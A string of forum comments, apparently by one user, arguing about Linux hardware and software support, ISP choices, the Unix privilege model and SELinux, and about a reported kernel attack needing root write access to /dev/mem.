...I think that you ought to go back and check what Linux distro you were trying. I suspect that it might have been one of the bare-metal masochistic distro's, or possibly one that was a little old. USB printers, for the most part just work on most modern distro's. Plug it in, and watch Linux tell you what the printer is, and which driver it will use.
And while it is the case that there are some codec's that may be difficult to find, they are probably equally difficult to find for OS 10.X, unless the vendor has explicitly provided them on the driver disk. And if this is the case, then probably the Windows codes will work inside a wrapper on Linux. If the vendors did some due diligence, and provided instructions as they do for Windows and OS 10.X, then you would see it is not Linux that was at fault, but the hardware vendors.
What is even more surprising is the fact that OS 10.X->Linux ports are not that difficult (OK, the screen API is different) but the rest is just *NIX like. So why no port?
I do take your point about applications, but this, again, is not Linux's fault. Just because an OS is free, some people have an expectation that all the apps. should be free as well (I accept that they can be called fretards, but this is not all Linux users). And some software vendors are afraid that if they use GNU tools to compile an app, that the app must be published under the GPL. Neither of these two statements are true. It is perfectly possible to port an app. to Linux and sell it. If there was a Linux port of Adobe Creative Suite, QuarkXPress, or FinalCut Pro, maybe more people (such as you!) would see Linux as an alternative, and it would start fulfilling it's promise.
Is this Linux's or the developers fault. No. They have made this excellent platform, and commercial companies have not taken advantage of it.
If you had a choice of buying a shiny Mac running OS/X, or the same hardware running Linux, with the same choice of software and drivers, but the Linux box was £50 or £100 cheaper, which would you choose? Many people would choose the cheaper option. And there must be significant numbers of Windows users who would make the same choice to avoid Vista. Why then will the vendors not see this as an opportunity, and start selling their wares for Linux.
Oh. I forgot. Microsoft are pulling the strings. They can make it difficult to develop for Windows by withholding Windows information an cheap licenses from developers who also produce Linux software, so few development houses can afford to sell Linux products. Why do MS not do that for OS/X devopers? Because without some competition, the US DoJ would slice MS up.
@Marcel van Beurden
Totally agree. Exactly as I see it.
Let's hope someone influential recognises this before it gets too late! Or maybe it is already... (listens for crisp rustle of donations to party 'election' funds)
Bottom of the Phorm
Our exchange has just been LLU'd. I should now be able to get a better high-download limit service than Virgin's ADSL service (everybody else running through BT Wholesale had hard limits that either could not be exceeded, or cost a fortune if you do go over).
After being a Virgin ISP customer for 12 years, I think the time to switch has come at last.
There are a group of people, which probably includes most non-computerate end users, who need a new type of machine. It must come with the OS and other software in ROM, and have every app they need installed already.
This way they cannot install something which could do damage. But equally, they would not be able to install the latest flash, Silverlight or any other flavour-of-the month add-on.
Can't stomach such a thing? No, I didn't think so. Nor will most users, although UMC's like the eeePC(s) nearly made it.
My coat is the one with the Amstrad Emailer box underneath it.
@AC on Funny how
OK, here is the difference.
On most Windows systems, people are running as a privileged user most of the time (they need to so their applications work). So if there is a hole in the browser that allows a remote-code exploit, it then has the required privilege to immediately add other back-doors, inject code into the core OS, and generally play havoc on the system in ways too many to mention.
On Linux, most users run as a restricted user by default. When they browse the internet, run applications etc, if there is a remote-code exploit, this code runs as a non-privileged user. So if it tries, for example, to write to /dev/mem, it fails. If it tries to change any system libraries, it fails. If it tries to change any binaries in system directories, it fails. In fact, pretty much everything damaging fails EXCEPT ON FILES OWNED by the user, which is their own data, and the configuration files for the apps they run.
Of course, it is possible to run most programs as root, but the normal state of affairs is that people don't. THIS IS THE DIFFERENCE.
By default, there is no way for code to cross the non-privileged/privileged divide without the user taking affirmative action, and unlike Vista, it does not ask for permission every two minutes, so as soon as it does, most Linux users will be wary.
Before you start, yes, it is possible to change the users path so that you run unintended programs, but normally, if you su or sudo, the path gets controlled again. Ditto the LD_PATH. Of course, you could try social engineering (go on, you really DO want to sudo this script I've dropped onto your system, even though you do not know what it does), but this is not a flaw in the OS. There really are people who know about security acting as gatekeepers-by-proxy for the dangerous things.
The UNIX model is not immune from exploits, but most of them are well known, and you can find out how to avoid them in any of the myriad of Linux or UNIX books that are available. Most distro's install pretty secure anyway, and they also contain information to avoid most of the pitfalls. And major distros patch new exploits as a result of code defects pretty quickly.
The plain truth is that *NIX security is too well understood to allow simple exploits any more. It's all in the pedigree.
Before people start, the term "userspace" used in the PDF does not mean from a non-privileged process. It needs to be run as root or another ID with write permission to /dev/mem.
What "userspace" means here is a process run as a normal process controlled by the scheduler, and not added from inside the kernel codebase (like a loadable kernel module would).
Basically, all this technique is doing is re-vectoring one of the system calls, something that people have been doing for as long as table driven vector entry for system calls has existed. UNIX has done things this way since it first existed 40+ years ago (it was very convienient in the PDP/11 world, as it used the EMT instruction). The only real trick here is reserving memory in the kernel address space, and even this is not new (I could probably think of about hald-a-dozen candidates for locating the code off the top of my head).
Due to a design flaw in the MT10 magtape driver code in Bell Labs UNIX version 7 for the PDP/11 (circa 1978), we used to hang the tape device moderatly frequently. I used to go in and zap the lock bit in the driver status table using db (the original UNIX debugger) to use it again without re-booting. And the Keele Kernel Overlay system used to re-vector all of the system calls to allow segmentation registers 6 to be altered to point to the area of memory that had the required code, before actually jumping to it. This was all done in kernel space, of course, but show that the techniques are not new.
So. Stop frightening the ordinary users with things most of them will not understand, and just say that if you allow root access on your Linux box to any-old-code, expect your system to be 'pwned'
Most major distros actually ship with SEL turned off.
There are not that many applications that would break if it were turned on, but the administration of the Linux system would need to be changed. As a UNIX luddite, (and by this I mean someone who has been using it for so long that fundamental change appears abhorent), I can understand this, and I real uneasy about turning SEL on on my own systems. I am keenly aware that the UNIX security model, which Linux (pre SEL) copies almost exactly, has always been weaker than it could have been (although much better than Windows up to Vista). The MULTICS model that VMS and PRIMOS implemented would have been better from the start, but UNIX was intended to be lightweight compared to MULTICS.
But, as the major variant of UNIX that I use in my professional life is implementing Role-Based-Access as well, I guess that I will just have to learn to live with it.
The MAC attacks are DOS attacks, and reading through the PDF on the Linux attack, firstly is it x86 specific, and secondly, to exploit it you need WRITE access to /dev/mem or /dev/kmem (it's slipped in to the end of section 3 that this is required, and the test here is being run from a # prompt, indicating root access).
*NIX security 101 states that these should be protected from write (and even read in many cases), for just this reason.
Of course, if your vector runs as root, then all bets are off, and there are innumerable ways of making a *NIX system do bad things, even if you have SE turned on.